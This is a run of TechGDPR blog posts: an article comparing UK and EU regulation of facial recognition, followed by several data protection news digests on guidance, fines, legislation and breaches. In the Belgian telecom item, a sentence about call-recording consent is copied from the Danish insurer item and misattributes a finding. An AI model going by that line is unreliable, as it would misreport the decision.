What does this mean around the world?

Countries such as the United States and United Kingdom are increasingly moving towards reliance on these technologies. Countries in the EU are also recording findings of some trial projects related to the use of Facial Recognition Technology. However, as the technology continues evolving and becomes increasingly more widespread, concerns arise in relation to potential consequences of using said technologies. A majority of concerns focus on biases and consequences in relation to law enforcement. In addition, concerns with regard to all individuals’ privacy rights are also at the forefront of the discussion, including: 

• Whether an indiscriminate recording of all individuals captured by cameras is aligned with the principle of data minimization;
• Concerns on the lawfulness and transparency of the use of said technology, as further discussed below; and
• Appropriate processing of special categories of personal data in accordance with legal requirements. 

Both the GDPR and its UK equivalent (the ‘UK-GDPR’) provide for some legal framework setting standards for the use of this technology. However, the departure of the UK from the EU in 2020 means that the two jurisdictions are now implementing entirely different approaches when it comes to the use of Artificial Intelligence. This blog post analyses said differences, and the implications thereof, with a focus on FRTs.

The history of public surveillance systems in the EU and the UK

Looking at the history of implementation of public surveillance systems in the EU and in the UK, sets the stage to highlight the difference in framework that applies to this day. 

Public authorities and private actors have implemented video surveillance as one of the measures to ensure security since the middle of the 20th century. Camera systems such as CCTV have been increasingly appearing in UK cities since the 1950s, and have progressively evolved technologically. As a result, we are now at the point where South London will be installing its first permanent facial recognition cameras.

Similarly, Germany saw its first shift in the usage of cameras for public security reasons in the 1960s.  By the 2000s, the majority of large European cities were deploying CCTV systems.

However, based on this history and according to researchers, the evolution in technical capabilities of CCTV and its respective use in the EU has always lagged behind that of the UK. One of the reasons for this was a lack of constitutional protections for the right of privacy. Meanwhile, EU countries have demonstrably had a stricter approach to privacy even prior to the Data Protection Directive passed in 1995. The EU has implemented further protective measures since, such as the AI Act. 

How does the use of facial recognition change between the EU and the UK?

While both jurisdictions use Facial Recognition Technology with the goal of enhancing public and national security, they differ vastly in how extensively they have applied it in practice.

The main difference is in its application, which is in turn related to the current regulatory differences. In the EU, current deployments of RBI systems are primarily experimental and localised. Examples of case studies include Facial Recognition Cameras at Brussels Airport, Facial Recognition at Hamburg G20, and the DragonFly Project in Hungary. There is currently no example of fully implemented and permanent FRT or RBI systems in the EU.

Additionally, the UK’s implementation of such systems is a current point of discourse across the country. As an example, part of MET police deployment policy for overt implementation of live facial recognition to locate people on a Watchlist is to be able to implement Live Facial Recognition onto “hotspots” for a number of crimes, ranging from theft and drugs to terrorism and human trafficking. 

Additionally, the use has extended to private companies, such as the retail and hospitality sector, to take advantage of the technology to enhance security and prevent theft and revenue loss.

Regulatory similarities

In both the EU and the UK, the GDPR regulates the usage of all data processing technologies, including Facial Recognition Technology. The UK also implemented the regulation at national level with the Data Protection Act 2018. Therefore, a number of legal requirements, and issues of public concern are common for both jurisdictions:

• Data needs to be processed lawfully, fairly and in a transparent manner. Where public interest can be an applicable legal base for public authorities and law enforcement (albeit not without justification). However, private companies are required to jump through more hurdles to justify the necessity and proportionality, and outright lawfulness, of the use of FRTs, typically under legitimate interest;
• Processing of biometric data means that Art. 9 special categories of personal data are being processed, adding an extra layer to the lawfulness argument. Such categories of data can only be processed pursuant to one of the exceptions listed in the Article 9. Again, reliance on substantial public interest could be an option, but not without having to make a balancing exercise, which leads to: the requirement to carry out a Data Protection Impact Assessment in accordance with Art. 35.3, where the usage of said technology arguably meets all 3 criteria;
• Further considerations and concerns include breaches to the principles of purpose and storage limitation, and data minimisation. 

What is the regulatory approach to facial recognition in the EU?

However, in the EU, the newly implemented AI Act regulates the specific usage of real-time remote biometric identification systems in its Article 5. The article outright bans the use of AI systems that create or expand facial recognition databases through the untargeted scraping of facial images from the internet or CCTV footage and the use of ‘real-time’ remote biometric identification systems in publicly accessible spaces for the purposes of law enforcement, although the latter comes with exceptions. These include:

• Search for abducted individuals, and victims of human trafficking and sexual exploitation;
• Prevention of a specific, substantial and imminent threat to life or threat of terrorism; and
• Localisation of a person suspected to have committed a criminal offence listed in Annex 2 of the Act (which does not include property damage, theft and/or burglary). 

Said exceptions, however, must still take into account rights and freedoms of the individuals involved. Additionally, Article 27 of the AI Act require a fundamental rights impact assessment and law enforcement authorities registering the system in the EU database according to Article 49.

How does the regulation framework differ in the UK?

Since its departure from the EU due to Brexit, the regulation of such technologies in the UK is entirely different. There is currently no AI-specific regulation in place. UK Parliament is currently discussing the only related legislation for the usage of such technologies, namely the Data Protection and Digital Information Bill.

Importantly, the draft of this bill demonstrates how the UK’s approach is opposite to that of the EU, possibly leading to less regulation. For example, through the abolishment of the Biometrics and Surveillance Camera Commissioner (BSCC). The underlying argument is that the removal of this office, in a period of fast technological change, will result in the loosening of safeguards designed to raise standards and protect citizens, and may ultimately result in the deployment of technologies that are not in the public interest. 

That is not to say that the use of said technologies will go entirely unchecked. The Information Commissioner Office made a statement about the usage of said technologies and calls for the responsible and lawful use of Facial Recognition Technology, and published guidance on appropriate use of Biometric recognition systems. However, the guidance still relies on mostly GDPR-based principles and rules. It does not add anything new to the conversation on the increased use of FRTs by law enforcement agencies or private companies, which might have legal implications for individuals. Therefore, the status quo remains that in comparison with the EU, the UK remains a regulatory sandbox for the use of such technologies. As a result, concerns arise about the ways this compliance vacuum could be exploited and relevant risk for individuals. 

Looking forward

Despite the technology being substantially more regulated in the EU, there is still criticism on the general use of FRTs, even with the existence of the GDPR and AIA rules in relation to the technologies. The vagueness of the definitions in the AI act, the changes made to the AI Act draft from an outright ban for the technologies to an approach with “exceptions” and the lack of clarity on the implementation of these technologies by private companies outside of law enforcement agencies.

The post Comparing the UK and EU’s framework on facial recognition technology appeared first on TechGDPR.

Stay up to date! Sign up to receive our fortnightly digest via email.

Swiss-US data transfers

The new Data Privacy Framework now allows for the secure exchange of personal data between Switzerland and certified US companies without any additional guarantees. The Swiss Federal Council on 14 August added the US to the list of countries with an adequate level of data protection. The relevant changes will apply from 15 September. The companies under Swiss-US data transfers framework will only be permitted to process the data for the purposes for which they were collected. Disclosure to third parties such as non-certified companies is not permitted. In the event of access by US public authorities to personal data transferred from Switzerland, various safeguards are provided, including access to a redress mechanism.

Collective actions under the GDPR

DLA Piper’s legal analysis looks at the CJEU’s recent decision, (C-757/22), where the violation of a controller’s information obligations under Art. 12 and 13 of the GDPR, can be subject to a representative action under Art. 80 of the GDPR. The case relates to Meta’s processing activities, claiming that the information provided to users by games in the App Center was unfair, particularly the failure to obtain valid consent from users. Instead, they were informed that by using certain games, the third-party provider would collect their data and have permission to publish this data and accept the general conditions and the relevant data protection policies.

More legal updates

California AI legislation: The progress of the California bill that would create the first-ever national safety regulations for the biggest AI systems is examined in an article published in The Guardian. According to the proposal, businesses would have to test their models and make their safety procedures available to the public. The law focuses on systems whose training costs exceed 100 million dollars in data. As of right now, no AI model has reached that point. The governor of California has until the end of September to determine whether to sign it into law.

BCR compliance guide: To support groups holding BCRs in verifying their implementation, the French CNIL provides them with a tool and describes the steps for its deployment, (available in English). BCRs refer to an intra-group data protection policy. They allow related entities to transfer personal data outside the EU, as provided by the GDPR. Separate monitoring tools were developed for local entities and group DPOs and should be adapted to the particularities of the organisation. 

Privacy notice tool

The UK Information Commissioner has replaced its privacy notice template with a generator tool to help you create a bespoke privacy notice in just a few simple steps. This brand-new tool has been designed for sole traders and start-ups, small and medium-sized businesses and charities. Also, by generating an additional privacy notice for your staff and volunteers, you could include this on your staff intranet, in your recruitment welcome packs or in your policies library.

E-shop applications

The Czech authorities have issued a warning about e-shop applications that require non-standard permissions on the user’s device and may collect excessive amounts of user data. Some of these are completely legitimate, but some are inappropriate from the point of view of the purpose of the application, (eg, access to location, contacts, videos or other files). Thus, app users should always carefully review the privacy policy and terms of use. 

Additionally, extremely low prices in some e-shops can be attractive, but they carry a risk that the provider receives profit in another way, (eg, by an excessive collection of personal data to pass on to third parties for a fee). If you still want to use the e-shop application, which may be associated with the above-mentioned risks, for example for a one-time purchase, then uninstall it from your device.

Guest access

The Data Protection Commissioner in Rhineland-Palatinate also launched an information campaign on online shops. It has become common practice to create a customer account for orders that last well beyond the individual purchase. Creating such a customer account can bring benefits to the customer. For example, further orders can be made without having to re-enter all the data, previous orders can be viewed, order and delivery status can be easily checked and favourite items can be saved.

However, customers do not always want such a long-term business relationship, so they should be able to freely decide whether or not they want to store their data in the online shop. 

Contract as a legal basis

The Latvian data protection authority reminds us that one of the legal bases for the processing of personal data is the performance of a contract. However, to be able to correctly apply this basis, it is important to understand in which cases data processing is really necessary for this purpose. The application of this basis must be evaluated not only from the controller’s perspective but it must also be taken into account whether a person as a data subject, when entering into a contract, could have foreseen that their data would be processed within the framework of the contract:

• the data must be processed to fulfil the obligations specified in the contract, (eg, an online store needs a customer’s address to be able to deliver the product with the help of a courier);

• the data must be processed to fulfil obligations to the organisation, (eg,  a person orders a new TV in an electrical goods store, and the store processes the customer’s payment data to receive payment);

• the contract has not been concluded, but the person has asked to perform an action, as a result of which the contract could be concluded, (eg, a person wants to buy travel insurance, but before buying it, they want to find out how much the policy will cost with a particular insurer, so they first submit their data to the insurer).

Finally, compliance with warranty provisions may also be a part of the performance of the contract, therefore it may require the storage of certain data even after the sale of the goods, and such processing will be justified by the performance of the contract.

AI analysis of phone conversations

The Danish regulator investigated an insurance company’s, (IDA Forsikring), use of artificial intelligence for the analysis of recorded telephone conversations. It stated that incoming telephone calls were recorded, after which the audio files from the recordings were sent for analysis by a data processor, which converted the files into text using self-developed speech recognition, partly to make the sound files searchable. The purpose of the analysis of the conversations is to improve IDA Forsikring’s member service, ensure quality and give the employees insight into their conversations to strengthen the service to the members. 

The regulator found this a valid legal basis under the GDPR, however, the current process for obtaining consent from the person calling in does not meet the data protection rules.

More enforcement decisions

Mass claim dismissed: A Dutch court has rejected allegations of collective damage claims in a data security case. The claims were made against several government agencies for inadequate protection of personal information, according to a cms-lawnow.com blog. There were significant security vulnerabilities in the IT systems that local health services employed during the COVID-19 pandemic. For months, some 35,000 employees had access to millions of people’s sensitive personal data. It was discovered that 1,250 people’s data had been taken. Based on European case law, the court deduced that non-material damages may only be granted to those who have suffered injury as a consequence of the GDPR violation. The concern about a potential breach in the future, since the possibility that personal data was illegally gained by third parties, is insufficient.

Delayed data access request: The Belgian regulator sanctioned a telecom operator  100,000 euros for a 14 month-late reply to a right-to-access request. The complainant and the defendant went through a mediation process after a contractual issue. The accused party has acknowledged their error. Still, the complainant was not satisfied. Then they made use of their access rights. Among other things, they were interested in learning the names of the workers who had processed their data and why they had done so. They submitted their request, making it clear that they wanted it forwarded to the DPO. Nevertheless, even though two staff worked on the request, it was neither approved nor forwarded to the DPO. The regulator found this a valid legal basis under the GDPR, however, the current process for obtaining consent from the person calling in does not meet the data protection rules. 

Data security

Biometrics and 2FA: Biometric procedures such as fingerprint and facial recognition are popular with consumers because they allow quick and easy access to online services as part of 2FA. But how secure is this authentication option in practice? The Federal Office for Information Security in Germany offers a white paper for developers and operators on biometric procedures in two-factor authentication, (in German), where the knowledge factor, (PIN or password,) is replaced by biometrics. 

Data protection-compliant redaction of documents: PDF and Office files can be fully readable despite blacking out with shapes or coloured bars, reiterates the Saxon data protection authority. To do this, users often only have to mark the supposedly blacked-out content from the file and copy it into a text editor, and everything is readable again. Moreover, with the help of artificial intelligence, blurred content can certainly be reconstructed. It is therefore important that data is not only visually but also technically removed or edited, (before any redactions, it is recommended to make a backup copy of the original file).

Also, because Office metadata may contain a history of changes, and other information on the person, their location, etc, the redacted Office document in its original file format, (docx), should not be shared. Instead, save or export the file as a PDF document, or if an editable version is necessary, copy all the already anonymised text into a new document and then share the new document. Similarly, an edited image must be saved in a file format in which the original layer cannot be restored. The JPG format, for example, is ideal for this. 

Big Data

Uber case explained: Uber was fined 290 million euros by the Dutch regulator for failing to implement adequate measures when transferring drivers’ data, including certain sensitive categories, to the US. The company discontinued using the “Privacy Shield” in 2021 when it was shown to be invalid. Uber later said that it complies with the new EU-US Data Privacy Framework implemented only in 2023; nevertheless, there remain at least two years where driver data may not have been protected.

During this period of legal uncertainty, Uber was sending data to its San Francisco headquarters without the drivers’ express consent or the usage of the EU Model Standard Contractual Clauses (SCCs). 

Clearview AI fine: The Dutch data protection authority has imposed a fine of 30.5 million euros and orders subject to a penalty for non-compliance of up to more than 5 million euros on Clearview AI. Clearview is an American company that offers facial recognition services. Among other things, Clearview has built an illegal database with billions of photos of faces, including of Dutch people. The Dutch regulator warns that using the services of Clearview is also prohibited.

Meta Pixel: The Swedish Data Protection Authority IMY decided on hefty fines against Apoteket and Apohem AB. This was after the companies used the Meta pixel on their websites and transferred privacy-sensitive personal data to Meta, (the tool is dedicated to improving the company’s marketing on Facebook and Instagram). Moreover, the companies did not have the routines required to discover the deficiencies themselves. The transfer of personal data had been going on for a long time and was only stopped after the companies were made aware of the incident by third parties. 

The post Data protection digest 18 Aug – 2 Sep 2024: Swiss-US data transfers, BCR guide, Clearview AI fine appeared first on TechGDPR.

Stay up to date! Sign up to receive our fortnightly digest via email.

Decentralised clinical research

To support sponsors in designing their decentralised clinical research projects, the French data protection authority CNIL with other state agencies set up a pilot project, (from January to September 2024). 20 selected projects will receive targeted support and updated guidance, looking especially at the entire lifecycle of personal data processing: 

• Roles and responsibilities, (oversight of incoming data);
• Informed consent process, (interviews, leaflets, signatures);
• Delivery of investigational products, (safety data, biological sample handling, home visits etc);
• Data collection and management, (defining and handling source data);
• Trial monitoring, (remote access).

In December 2022, the Commission published the European recommendations on decentralised clinical trials. It came after the COVID-19 pandemic, highlighting the importance of digital tools and decentralisation procedures in health research projects.

Meta’s AI virtual assistant under investigation in the EU

Norway’s data protection regulator reports that as of June 26, posts and photos on Facebook, (often of a private nature), and Instagram will be used to develop and improve Meta’s AI assistant service. This won’t include private messages to friends and family. Reportedly, Meta believes that the company does not need to ask for users’ consent since their interest in using the content outweighs the users’ interests and rights. The regulator has already received a complaint and started an investigation into the new practice and expects that there will be more complaints, both in Norway and in Europe. 

At the moment individuals in Norway can only object to it in a dedicated form on Facebook and Instagram if they wish.

Protections against Data Scraping

The Italian data protection authority has issued nonmandatory guidance on how to protect personal data published online by public and private entities in their capacity as data controllers from web scraping. It particularly targets the indiscriminate collection of personal data on the internet, carried out by third parties for training generative AI models. Some concrete measures, (taking into account the latest technology and the costs of implementation, in particular for SMEs) may include: 

• creation of areas, accessible only upon registration, to remove data from public availability;
• the inclusion of anti-scraping clauses in the terms of service of websites; 
• the monitoring of traffic to web pages, to identify any abnormal flows of incoming and outgoing data; 
• the technological solutions made available by the same companies responsible for web scraping, (eg, intervening on the robots.txt file).

Other official guidance

Data collection: Getting data collection right is a key to your overall GDPR compliance, as once you have understood and complied with the principles of your data collection, the same principles apply throughout the lifecycle of what you do with the data you have, explains the Guernsey data protection authority. It also offers new guidance regardless of the collection method, (in-person interviews, emails, online forms, paper forms, video surveillance, social media activity, phone calls etc). 

Dynamic data security: Data security measures must be viewed as dynamic, as opposed to a static, obligation, according to the Guernsey regulator. In its latest statistical research, the agency found that the long-established trend of emails being sent to the wrong person continues to be the most common reported breach. At the same time, the vast majority of breaches were still discovered by individuals, and not through system auditing or testing. The regulator requests a deeper understanding of the potential associated harms, ranging from “loss of confidentiality” to “emotional distress,” to properly assess the risk of such incidents. 

‘Manage GDPR’:  The Spanish regulator AEPD published a new version of its Manage GDPR tool,(available in English). ‘Gestiona’ targets controllers and processors as well as data protection specialists. It allows managing the records of the processing activities, (ROPA), with up to 500 treatments, in an integrated way, and for different entities. It is now possible to manage the risk with privacy measures that the tool suggests for each identified risk factor. The tool is managed on the user’s device via their browser, without installing any application and storing the information locally. 

Legal processes

Anonymisation standard: The Quebec government enforced the Regulation respecting the anonymisation of personal information. It prescribes that once the purposes for which personal data was used are achieved, organisations, (including the private sector), have two choices: destroy or anonymise it for use only for serious and legitimate purposes. It will largely apply from 2025. 

UK Data Protection reform on hold: The Data Protection and Digital Information Bill falls ahead of a snap UK general election. As UK observers explain, any legislation that did not complete its passage by the end of the ‘wash-up’ on 24 May falls and will need to be reintroduced in the next Parliament. The draft bill was criticised for its flexibility towards data sharing in trade and innovation and state surveillance, threatening the adequacy decision granted by the EU. 

US Privacy and AI legislation: A good chunk of future privacy and AI bills has moved forward through state legislatures this past month. This includes the Maryland Age-Appropriate Design Code and other privacy acts, the Colorado Consumer Protections for AI Act, and the Vermont, Minnesota, and Kentucky Consumer Data Privacy Acts. California’s Bill on AI Accountability was read in the state Assembly, and the House of Representatives subcommittee advanced the American Privacy Rights Act Discussion Draft. 

Worldcoin on pause in Spain

The Worldcoin project committed to freeze its activity in Spain until the end of the year or until the final approval of its processing activities. The data protection authority of Bavaria, where the company has its main establishment in Europe, is progressing and is expected to conclude soon with a final binding decision. Worldcoin uses iris scans for unique identification with plans to expand for wider adoption of a global currency on the blockchain, explains the Techtarget.com article. The iris structure is used to generate a unique identifying code that is saved on the Worldcoin decentralised blockchain to prevent others from replicating the code.

The biometric data is not stored by the scanning device, but is kept in the form of anonymised ‘IrisHash’. 

More enforcement decisions

Failed backup testing: The Danish data protection authority criticised the breakdown of NemID in 2022, where up to 1.5 million users experienced problems logging in to major public services. The data controller followed their emergency procedure to restore the operation with a backup solution. This appeared to be unavailable, and the test to establish the viability of the backup solution was last carried out two years before the collapse. Such tests show whether recovery can be done with existing guides/procedures, that hardware, software, and data can work together, and that recovery can happen quickly enough as the consequences usually increase with time.

Spreadsheet error: In the UK, the Police Service of Northern Ireland is facing a 750,000 pound fine for failing to protect the personal information of its entire workforce. Personal information including surname, initials, rank and role of all 9,483 serving officers and staff was included in a “hidden” tab of a spreadsheet published online in response to a freedom of information request. The error caused several officers to move house, cut themselves off from family members and completely alter their daily routines because of the tangible fear of threat to life. The cause of the data breach was more than trivial as there were insufficient internal procedures and sign-off protocols for the safe disclosure of information.

Data security

US financial entities: If your business is covered by the FTC’s Gramm-Leach Bliley Safeguards Rule, an amendment that requires covered companies to report certain data breaches is now in effect. It lists thirteen distinct company categories, including payday lenders, mortgage lenders, finance companies, mortgage brokers, account servicers, cheque cashers, wire transfers, collection agencies, tax preparation organisations, credit counsellors, and other financial consultants. According to the amendment, financial institutions must report to the FTC any security breach involving the personal data of at least 500 customers as soon as feasible, but no later than 30 days after discovery.

Big Data

Microsoft vs schools: Microsoft’s 365 Education services violate children’s privacy by shifting the responsibility to the school administrations, states the NOYB privacy advocacy group. Digital service providers like Microsoft tend to designate educational bodies as data controllers in their Terms and Conditions. However, in practice, the schools have no control over the applications, their design, and data operations. In just one example, they cannot satisfy data access requests by individuals as they don’t hold the necessary data. 

Malware and data stealing: Law enforcement agencies in the US and EU announced massive operations against some of the most influential cybercrime platforms for delivering ransomware and data-stealing malware. They targeted droppers/loaders, (a custom-made program designed to surreptitiously install malware onto a system), deployed through email attachments, hacked websites, or bundled with legitimate software. Droppers are typically used in the initial stages of a breach, and they allow cybercriminals to bypass security measures and deploy additional harmful programs. 

ShinyHunters ransom: Meanwhile Ticketmaster in the US was hit by a data hack that may affect 560m customers, the Guardian reports. Cybercrime group ShinyHunters reportedly demanded 400,000 pounds ransom to prevent data from being sold. The unauthorised access was spotted by a third-party cloud database environment containing the company’s data. Earlier Bank Santander also confirmed being hacked by the same group. ShinyHunters claimed it had the data of 30m customers and staff details, 6m account numbers and balances, and 28m credit card numbers, and is demanding a ransom of 1.6m pounds. 

The post Data protection digest 18 May – 2 Jun 2024: decentralised clinical research, Meta’s new virtual assistant appeared first on TechGDPR.

Stay tuned! Sign up to receive our fortnightly digest via email.

EU-US redress mechanism

The EDPB has completed its much-anticipated Information Note and a Complaint Form for EU/EEA individuals about alleged violations of US law concerning personal data collected by US national security authorities. It applies regardless of the transfer tool used to transfer the complainants’ data to the US, (Data Privacy Framework, standard or ad hoc contractual clauses, binding corporate rules, codes of conduct, certification mechanisms, derogations). However, this redress mechanism only applies to data transmitted after 10 July 2023. 

In short, after receiving and verifying the complaint, the data protection authority, (DPA), will transmit it, in an encrypted format, to the EDPB Secretariat. The latter will then transmit it to the US authorities for a binding decision, taken by the Office of the Director of National Intelligence’s Civil Liberties Protection Officer, (CLPO). Complainants can appeal the CLPO’s decision before the Data Protection Review Court within 60 days after receiving the notification by the DPA. There is also a possibility to complain about commercially related violations to EU DPAs. 

In July 2023, the European Commission decided that the US ensures an adequate level of protection for personal data transferred from the EU to organisations in America that are included in the ‘Data Privacy Framework List’, without the need to rely on Art. 46 GDPR transfer tools, (standard data protection clauses, binding corporate rules). The US Government in the meantime aims to introduce safeguards against bulk and targeted collection of intelligence signals, (eg, FISA Section 702), that apply to all data transferred to the US, regardless of the transfer tool used by the EU exporters.

More legal updates

FISA Section 702 reauthorised: In parallel, a new US bill just signed into law extends a key US surveillance program for another two years. Legislators claim the surveillance tool first authorised in 2008 is crucial in disrupting terrorist attacks, cyber intrusions, and foreign espionage. It permits the government to collect without a warrant the communications of non-Americans outside the country. Amendments to protect Americans’ communications when they are in contact with those targeted foreigners, by getting a prior warrant from a judge, failed the final passage. 

UK adequacy threatened: The Parliament Justice Committee, (LIBE), has criticised the overall direction of the data policies of the UK Government. Its current governmental actions are eliminating constraints arising from European or international law and limiting the impact of European court jurisdiction and interpretations on UK law. Concerns exist about UK intelligence agencies, especially their bulk collection of communication data, which is not in line with the EU Charter of Fundamental Rights. Thus, the UK could become a transit country for data that cannot be sent from the EU/EEA to “inadequate” third countries.

UK data protection reform moves on: The new Data Protection and Digital Information Bill went through the final examination of the committee stage. After the final reading, followed by the consideration of amendments stage in Parliament, (which can be a lengthy process), it will be presented for Royal Assent to become law. The new law promises to solve the complexity of the current regulatory regime, reduce compliance costs, and remove barriers to responsible innovation so that firms, public sector organisations and consumers can take “full advantage of the benefits” of data. 

Data Scraping

Data scraping by private actors is almost always illegal, explains the Dutch data protection authority AP. Scraping is the automatic collection and storage of information from the Internet. In several cases, it is already not allowed anyway, including: a) scraping the internet to create profiles of people and resell them; b) scraping information from protected social media accounts or private forums; c) scraping data from public social media profiles for insurance matters, etc. 

A widespread misunderstanding is that scraping is allowed because everything on the internet is already available to everyone. This does not imply consent by the individual. Scraping for the legitimate interest of private businesses or individuals should not be used if the sole purpose is making money. However, scraping can be justified when a company gets information from media outlets on its activities.

More official guidance

Targeted advertising: A CJEU Advocate General’s opinion in the Schrems/Meta case, (C-446/21), similarly states that processing data for personalised advertising purposes cannot be justified just by meeting “the manifestly made public” condition for special category data. It rather elevates the particular protection granted to the special categories of data under Art. 9 of the GDPR, which means that it still must be evaluated as “ordinary” personal data, treated lawfully, clearly, and proportionately, and respecting the purpose limitation principle.

BCRs maturity test: The French data protection authority CNIL published a self-assessment tool to test the level of maturity of organisations’ Binding Corporate Rules for restricted data transfers. The companies concerned are private businesses of multinational types, established in several countries of the EU and abroad.  The set of resources covers all stages of a project, from its preparation to the approval procedure. The test is to be completed by the data protection officer or any other person in charge of the BCR project.

Health Breach Notification: The US Federal Trade Commission finalised changes to the Health Breach Notification Rule. It underscores its application to health apps and similar technologies not covered by HIPAA, and obliges them to notify individuals, the Commission, and, in some cases, the media of a breach of unsecured personally identifiable health data. It also requires third-party service providers to those vendors of related entities to notify them following the discovery of a breach.

Safe biometric technology use

The Dutch data protection authority AP answers some frequently asked legal questions about facial recognition. The document is intended for privacy professionals and organisations that want to use facial recognition. Facial recognition is in principle prohibited. One of the exceptions is when facial recognition is necessary for authentication or security purposes (eg, the security of a nuclear power plant, or military production needs). However, this applies only once the data protection impact assessment ,(DPIA), has been carried out, demonstrating that it is necessary and that there is an important public interest. 

The AP also defines under which conditions there can be ‘personal or household use’ when applying facial recognition. For example, unlocking a phone with facial recognition, if the biometric data is stored on the phone itself, and the user decides what happens to that data. It must be up to the user to decide – whether to unlock the phone using a PIN code or face recognition. 

European Health Data Space

MEPs approved the creation of the European Health Data Space, improving citizens’ access to their health data and boosting secure sharing in the public interest. Universal Electronic health records, (EHR), will include patient summaries, electronic prescriptions, medical imagery and laboratory results. They will be available for health professionals across the EU, (with the patient’s consent), and for trusted entities such as clinical researchers, statisticians and policy-makers, (in an anonymised or pseudonymised format). Once officially published after the Council’s approval, it will be applied two years later, with some temporary exceptions for specific categories of data. 

Sim cards illicit activation fine

A company in Italy that manages two phone shops will have to pay 150 thousand euros for having illicitly activated SIMs, subscriptions and charges for the purchase of cell phones and GPS trackers using the personal data of hundreds of users without their knowledge. The company had activated 1300 telephone cards using data and identity documents extrapolated from the systems of the telephone operator whose products it sold to unduly saved in-store. For instance, a complainant was charged on her credit card relating to the activation of a new contract in the name of her deceased husband.

The company had also activated unsolicited services by inducing customers to sign, via a tablet, without clarifying the consequences of such consents, along with selling mobile phones which had not been requested by customers nor delivered to them. The company had evaded the controls of the telephone operator and the related provisions regarding the processing of user data, thus acting as an independent data controller.

More enforcement decisions

Cookie collection without notice: The Croatian data protection regulator issued administrative fines of 15,000 and 20,000 euros on managers of gambling and betting activities due to the illegal processing of personal data through cookies, and without allowing the users to give or withdraw their informed and voluntary consent. In particular, the processing managers did not separate the cookie banner or enable respondents to consent to different purposes, (marketing, analytics/statistics). 

The processor also did not adequately inform the users about the legal basis, groups/types of cookies, the function/purpose of each cookie, and the cookie storage period. In addition, the data controller was fined for processing the respondents’ data at the very moment of loading the website, (since the respondents were not informed about the processing). 

Prohibited employment practices: The French CNIL notified a company to minimise candidates’ data collection. The company required applicants to provide their place of birth, nationality, marital status, (spouse’s name and surname, date and place of birth, their profession, the number of children and their age), as well as all salaries received in previous companies. This information was not necessary for assessing the candidate’s ability to perform the job. An aggregate level of detail reflecting the candidate’s nationality, (French, EU and non-EU categories), would suffice. The candidate could, however, on their initiative, provide any useful information, including to justify their salary claims.

Ring case

In the US, following a settlement with Ring, the Federal Trade Commission is returning more than 5.6 million dollars to customers. The company allowed employees and contractors to access consumers’ private videos and failed to implement security protections, enabling hackers to take control of consumers’ accounts, cameras, and videos. Ring also deceived its customers by failing to restrict employees’ and contractors’ access to its customers’ videos, using its customer videos to train algorithms without consent. 

Data security

Ransom attack: The EDPB provided a summary of a recent Greek regulator fine where a company, (Hellenic Post Services ELTA SA), failed to implement technical and organisational measures resulting in unauthorised access by third parties. The first incident involved a breach of data which was encrypted to demand a ransom, the result of a malicious attack by third parties while the second incident involved the leakage of personal data, which was subsequently published on the Dark Web. 

Cybersecurity tool: The UK National Cybersecurity Centre issued the latest version of the Cyber Assessment Framework reflecting the increased threat to critical national infrastructure. The guide is for all organisations responsible for securing any critical network and information systems, covering remote access, privileged operations, user access levels and multi-factor authentication, (B2a and B2c principles). Other organisations may find this tool useful too.  

Strong password rule: In the UK makers of phones, TVs, and other internet-connected smart devices are now legally required to meet minimum security standards, states the Department for Science, Innovation and Technology. Manufacturers are banned from having weak default passwords like ‘admin’ or ‘12345’ and if there is a common password the user will be prompted to change it on start-up. 

Big Tech 

Data brokerage: A new data broker restriction was signed into law on 24 April in the US, JDSupra law blog reports. ‘Protecting Americans’ Data from Foreign Adversaries Act of 2024’ prohibits data brokers from sharing sensitive personal information with a broad range of entities that may have ties to Russia, China, Iran, and North Korea. This includes data on finances, genetics, health, biometrics, communication contents, exact geolocation, and data about minors. Any organisation that provides data to another organisation that isn’t serving as a service provider in exchange for a significant fee is known as a “data broker.” 

US TikTok/China row: ByteDance prefers TikTok be shut down rather than sold if the Chinese owner exhausts its legal options in fighting legislation to ban the platform from US app stores, according to Reuters. The US recently passed legislation allowing for the suspension of the popular service due to widespread concerns that China may access Americans’ data or use the app for spying. TikTok’s major assets include its algorithms, source codes, user data, and product operations and management. However, Chinese rules preserve TikTok’s intellectual property, making it difficult for US buyers to obtain source codes and similar data acquisition.

“Cookie pledge” fails: As Google delays the demise of third-party cookies, a European Commission campaign to get Big Tech companies to voluntarily commit to a “cookie pledge” has reportedly failed. The draft pledging principles ensure that users receive concrete information on how their data is processed, and the consequences of accepting different types of cookies; consent should not be asked again for a year once it has been refused. Some companies lost interest in the proposal since they depend on data harvesting for income, while others were worried that it would not comply with existing laws. 

The post Data protection digest 18 Apr – 02 May 2024: EU-US redress mechanism and European Health Data Space taking shape appeared first on TechGDPR.

Legal processes

Financial data: The EDPS discussed recommendations to encourage data sharing to extend the range of available financial services and products, while also giving people or organisations control over the processing of their financial data. Individuals and organisations, according to the proposals, would govern access to their financial data using dashboards offered by financial institutions. Individuals would be able to monitor, limit, or authorize access to their information. Users should be supplied with comprehensive, accurate, and unambiguous information about the financial service provider asking for access to their data. It should also disclose the type of product, payment, or service for which an individual’s data will be utilized, as well as the categories of data required.

Digital Services Act: The Digital Services Act took effect for large online operators serving in the EU on 25 August. 19 platforms and search engines with at least 45 million users must comply with stricter rules concerning data collection, privacy, disinformation, dark patterns, online hate speech and more. This includes a ban on targeted advertising of minors based on profiling, and a ban on targeted advertising using special categories of personal data, such as sexual orientation or religion. Online platforms will be required to redesign their systems and prove they have done so to the European Commission, (including publishing the risk assessments). Additionally, vetted researchers can access the data of those services to conduct analyses on systemic risks in the EU. Smaller platforms will be subject to the same regulation beginning in 2024. They will, however, be supervised by national agencies rather than Brussels. 

Cybersecurity and risk assessment in California: The California Privacy Protection Agency, (CPPA), has published its proposed Cybersecurity and Risk Assessment Audit Regulations. According to the CPPA, official regulation processes for cybersecurity audits, data protection risk assessments, and automated decision-making technologies have yet to begin. These versions are intended to promote board deliberations and public participation. They provide standards for service providers and contractors, assisting organisations in meeting audit compliance. The regulations state that every business that processes personal information that potentially poses a serious risk to customers’ security must conduct an audit, (annually). It also describes the components to be evaluated and the measures to be taken, as summarized by digitalpolicyalert.org. 

EU-US Data Privacy Framework: Almost all transmissions of personal data to US-based companies, if they have committed themselves to the certification mechanism, are covered by the EU-US Data Privacy Framework, explains the Bavarian state data protection commissioner  However, for the transfers of personal data collected in the context of an employment relationship, (‘HR data’), the US business must explicitly state it in its certification. Particular attention must also be paid to onward transfers, for example, if the US processor working for the EU data exporter transmits the personal data to a sub-processor in another third country. The US adequacy decision cannot apply in this situation. 

Official guidance

